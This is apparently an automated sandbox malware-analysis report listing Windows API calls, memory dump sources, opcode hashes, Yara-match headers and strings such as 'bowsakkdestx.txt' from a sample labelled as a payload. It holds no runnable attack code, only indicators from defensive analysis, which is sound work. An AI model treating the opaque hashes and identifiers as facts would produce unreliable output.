                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorMode$DriveDrivesExistsFileLogicalPathType
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2560635915-0
                                                                                                                                                                        • Opcode ID: 4836c1db1d25a00ecb8c0fdc61dddce2dc79497ec479d8292a0a8900f1198fd6
                                                                                                                                                                        • Instruction ID: afb02862e75e84cb15e9f39cf73499b4d7486d717fe9dc49682c170c3b007fb5
                                                                                                                                                                        • Opcode Fuzzy Hash: 4836c1db1d25a00ecb8c0fdc61dddce2dc79497ec479d8292a0a8900f1198fd6
                                                                                                                                                                        • Instruction Fuzzy Hash: 1441C17150C3409FC710EF68C885B5FBBE4EB99719F500A6CF085962A1D7B5C548CB93
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • _malloc.LIBCMT ref: 00BCB70B
                                                                                                                                                                          • Part of subcall function 00BB0C62: __FF_MSGBANNER.LIBCMT ref: 00BB0C79
                                                                                                                                                                          • Part of subcall function 00BB0C62: __NMSG_WRITE.LIBCMT ref: 00BB0C80
                                                                                                                                                                          • Part of subcall function 00BB0C62: RtlAllocateHeap.NTDLL(00DB0000,00000000,00000001,?,?,?,?,00BB3B69,?), ref: 00BB0CA5
                                                                                                                                                                        • _free.LIBCMT ref: 00BCB71E
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocateHeap_free_malloc
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1020059152-0
                                                                                                                                                                        • Opcode ID: f51247a2c8edf308c852c0373dc226d12569051d9f8dc410f9e72db864f6fa60
                                                                                                                                                                        • Instruction ID: b17f683c7907748ec1883d9ef00c4bae99b5dd4fed2150e25f9aacdad41a164b
                                                                                                                                                                        • Opcode Fuzzy Hash: f51247a2c8edf308c852c0373dc226d12569051d9f8dc410f9e72db864f6fa60
                                                                                                                                                                        • Instruction Fuzzy Hash: 14119132505715AFCB312FB4AC86FBE3AD8EF85361F1045AAFC59A6151DF708C409691
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 00BAF085
                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BAF0AC
                                                                                                                                                                        • DispatchMessageW.USER32(?), ref: 00BAF0B6
                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BAF0C4
                                                                                                                                                                        • WaitForSingleObject.KERNEL32(0000000A), ref: 00BAF0D2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1380987712-0
                                                                                                                                                                        • Opcode ID: fe2a593a4bd5e747066365b2ae262c78cba085728071784bb57315478cfb8323
                                                                                                                                                                        • Instruction ID: ed4abd93faa147ce185e07782f26213d2e2d0e4986e27c7fe4513cc18a2097b5
                                                                                                                                                                        • Opcode Fuzzy Hash: fe2a593a4bd5e747066365b2ae262c78cba085728071784bb57315478cfb8323
                                                                                                                                                                        • Instruction Fuzzy Hash: 730184356403096AEA309B54DC86FEE77A8E745B04F504051FA00AB1E3D7B5A545CBA4
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 00BAE515
                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BAE53C
                                                                                                                                                                        • DispatchMessageW.USER32(?), ref: 00BAE546
                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BAE554
                                                                                                                                                                        • WaitForSingleObject.KERNEL32(0000000A), ref: 00BAE562
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1380987712-0
                                                                                                                                                                        • Opcode ID: 48720bd9f44441faab8d6f632bf6e615ebe20a020ef8b2048ec5016b95ad5939
                                                                                                                                                                        • Instruction ID: 1b637ffbefb5684ff91a2a0cf8276ed58ee2161d04d566b0bd8a76cd77afc020
                                                                                                                                                                        • Opcode Fuzzy Hash: 48720bd9f44441faab8d6f632bf6e615ebe20a020ef8b2048ec5016b95ad5939
                                                                                                                                                                        • Instruction Fuzzy Hash: 4301DB35B803497AEB209B54EC87FAE7BACE745B08F144051FA00BB1E2D6F9A545C7B4
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 00BAFA53
                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BAFA71
                                                                                                                                                                        • DispatchMessageW.USER32(?), ref: 00BAFA7B
                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BAFA89
                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 00BAFA94
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1380987712-0
                                                                                                                                                                        • Opcode ID: 532fd262fd5af032d09f51c6669e7221e37bb2aeeb1784e06d8804849ea8be3b
                                                                                                                                                                        • Instruction ID: 202497c6d3a827972449d65d04f7797bd25dfcb68585105b00cfd013fc463e45
                                                                                                                                                                        • Opcode Fuzzy Hash: 532fd262fd5af032d09f51c6669e7221e37bb2aeeb1784e06d8804849ea8be3b
                                                                                                                                                                        • Instruction Fuzzy Hash: 62018631B40309BBEB209B94DC8AFFA3BACEB45B41F544061FA04FE1D1D7F5A84586A0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 00BAFE03
                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BAFE21
                                                                                                                                                                        • DispatchMessageW.USER32(?), ref: 00BAFE2B
                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BAFE39
                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 00BAFE44
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1380987712-0
                                                                                                                                                                        • Opcode ID: 532fd262fd5af032d09f51c6669e7221e37bb2aeeb1784e06d8804849ea8be3b
                                                                                                                                                                        • Instruction ID: 71c7da6749863d8d4aec46a25f95232d9fb3d50078d88e1bcb161b39bd73bf39
                                                                                                                                                                        • Opcode Fuzzy Hash: 532fd262fd5af032d09f51c6669e7221e37bb2aeeb1784e06d8804849ea8be3b
                                                                                                                                                                        • Instruction Fuzzy Hash: 84018B317403097BEB205B95DC8AFEB3BACDB45B01F544051F600BF1E2D7F5984586A0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __aulldvrm
                                                                                                                                                                        • String ID: $+$0123456789ABCDEF
                                                                                                                                                                        • API String ID: 1302938615-1400378107
                                                                                                                                                                        • Opcode ID: 796be5353c2a7e208fda4dc63d8dbf2231199cb74a4b8078db4acba760493d6b
                                                                                                                                                                        • Instruction ID: da8481e7a29a016beaf71f72868cdc7fae135cb03aa52e872deb200fc00853b5
                                                                                                                                                                        • Opcode Fuzzy Hash: 796be5353c2a7e208fda4dc63d8dbf2231199cb74a4b8078db4acba760493d6b
                                                                                                                                                                        • Instruction Fuzzy Hash: FE818EB1A087919FD710CF2A9840A2BBBE5FFD8744F150A9DF98997351D730ED018B92
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _memmove
                                                                                                                                                                        • String ID: invalid string position$string too long
                                                                                                                                                                        • API String ID: 4104443479-4289949731
                                                                                                                                                                        • Opcode ID: 47d49fef4a5fad772f42d8c2d14a3e6cefa322e135f95f9409cfc8127d2cf5a9
                                                                                                                                                                        • Instruction ID: 4438dfc30597c28cfab0107905afe0a611595579ee8a3bd412c5860da0d895f3
                                                                                                                                                                        • Opcode Fuzzy Hash: 47d49fef4a5fad772f42d8c2d14a3e6cefa322e135f95f9409cfc8127d2cf5a9
                                                                                                                                                                        • Instruction Fuzzy Hash: 0851C37274C1049BDB24CF1CDC84A6A77E6EF86710B2489ADF846CB741EE31DD508BA4
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _memmove
                                                                                                                                                                        • String ID: invalid string position$string too long
                                                                                                                                                                        • API String ID: 4104443479-4289949731
                                                                                                                                                                        • Opcode ID: a00d2e0f40aae91326f75c83fd5fecd3aad41ed721c1da7d384a27763637f776
                                                                                                                                                                        • Instruction ID: e9a6aef1367425fc40ec05127a7b9d09724c274b9901f66b6891eb3ff1e1811a
                                                                                                                                                                        • Opcode Fuzzy Hash: a00d2e0f40aae91326f75c83fd5fecd3aad41ed721c1da7d384a27763637f776
                                                                                                                                                                        • Instruction Fuzzy Hash: BE310831318304ABDB24DF4CDC85A6AB7E6EBC27107204A9DF865DB781D7B1ED418BA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _memset
                                                                                                                                                                        • String ID: .\crypto\buffer\buffer.c
                                                                                                                                                                        • API String ID: 2102423945-294840303
                                                                                                                                                                        • Opcode ID: 7e91265532f984758bb8dcdad74962d21cfb593d8425b4c767b3d9257121fe7b
                                                                                                                                                                        • Instruction ID: bab24246bd942330b61373da5881190432dc55f359916d4603c04cda35c3bbad
                                                                                                                                                                        • Opcode Fuzzy Hash: 7e91265532f984758bb8dcdad74962d21cfb593d8425b4c767b3d9257121fe7b
                                                                                                                                                                        • Instruction Fuzzy Hash: 2F21F2B6B002217FE2146A5DFC82B66B3D9EB84B14F208569F209DB281D3A0B85083D5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        • 8a4577dc-de55-4eb5-b48a-8a3eee60cd95, xrefs: 00B9C687
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: StringUuid$CreateFree
                                                                                                                                                                        • String ID: 8a4577dc-de55-4eb5-b48a-8a3eee60cd95
                                                                                                                                                                        • API String ID: 3044360575-2335240114
                                                                                                                                                                        • Opcode ID: 9623a6691c35bf6d15abb78f16647423be651b3f39a3e82eecad1edf91ce1eda
                                                                                                                                                                        • Instruction ID: b31bc040e8994c69fed4c652f94cecf4fbc603af026717225f2da118d879dbbe
                                                                                                                                                                        • Opcode Fuzzy Hash: 9623a6691c35bf6d15abb78f16647423be651b3f39a3e82eecad1edf91ce1eda
                                                                                                                                                                        • Instruction Fuzzy Hash: C021F976208305ABDB20DF28D844B9FBFE8EF81754F004AAEF485932A1D775D544C792
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00B9C48B
                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00B9C4A9
                                                                                                                                                                        Strings
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Path$AppendFolder
                                                                                                                                                                        • String ID: bowsakkdestx.txt
                                                                                                                                                                        • API String ID: 29327785-2616962270
                                                                                                                                                                        • Opcode ID: 856f4826b319ead6c338ee6139b39732f6ac62aa7c329ab9f2c603daa2f0773e
                                                                                                                                                                        • Instruction ID: 4ed4fc43e27829c057d51ad414819b442745a3f1fc8b4b1d51bdbe9c2817e348
                                                                                                                                                                        • Opcode Fuzzy Hash: 856f4826b319ead6c338ee6139b39732f6ac62aa7c329ab9f2c603daa2f0773e
                                                                                                                                                                        • Instruction Fuzzy Hash: 3801DB7268032837DE307A546C86FFF779C8B51B22F0000E6FE08D6241D5E1559687E1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00BABA4A
                                                                                                                                                                        • RegisterClassExW.USER32(00000030), ref: 00BABA73
                                                                                                                                                                        Strings
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ClassCursorLoadRegister
                                                                                                                                                                        • String ID: 0$LPCWSTRszWindowClass
                                                                                                                                                                        • API String ID: 1693014935-1496217519
                                                                                                                                                                        • Opcode ID: 84aacffac1a8df2aea0ebb7d5fd4aabf5f6f0f7633e6a054626d1a3eef7ab87d
                                                                                                                                                                        • Instruction ID: a66585d87373e40ed7d4c2e5ccf6c5e305c8d2d631b909b7beefe8d240710b60
                                                                                                                                                                        • Opcode Fuzzy Hash: 84aacffac1a8df2aea0ebb7d5fd4aabf5f6f0f7633e6a054626d1a3eef7ab87d
                                                                                                                                                                        • Instruction Fuzzy Hash: 7BF0AFB4C0431C9BEF00DF90D9597DEBBB4BB08309F104149D4147A280D7BA1648CF95
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00B9C438
                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00B9C44E
                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00B9C45B
                                                                                                                                                                        Strings
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Path$AppendDeleteFileFolder
                                                                                                                                                                        • String ID: bowsakkdestx.txt
                                                                                                                                                                        • API String ID: 610490371-2616962270
                                                                                                                                                                        • Opcode ID: 209f34e6997c758eb5dbe30804599a4492632f6464b46d2562c0c256250ed310
                                                                                                                                                                        • Instruction ID: 12edb67d399f989d369d2e1eef34bfbfddeb4dedb4ed328a189f612b4861e326
                                                                                                                                                                        • Opcode Fuzzy Hash: 209f34e6997c758eb5dbe30804599a4492632f6464b46d2562c0c256250ed310
                                                                                                                                                                        • Instruction Fuzzy Hash: DDE0867964031C6BEF20ABA0DDCAFDD776C9B04B02F0040E2BB44E21D1D6B0A5C48B51
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _memmove_strtok
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3446180046-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2974526305-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00BCC6AD
                                                                                                                                                                        • __isleadbyte_l.LIBCMT ref: 00BCC6DB
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00BCC709
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00BCC73F
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3058430110-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 00B9F125
                                                                                                                                                                        • lstrlenA.KERNEL32(?,?,00000000), ref: 00B9F198
                                                                                                                                                                        • WriteFile.KERNEL32(00000000,?,00000000), ref: 00B9F1A1
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00B9F1A8
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Similarity
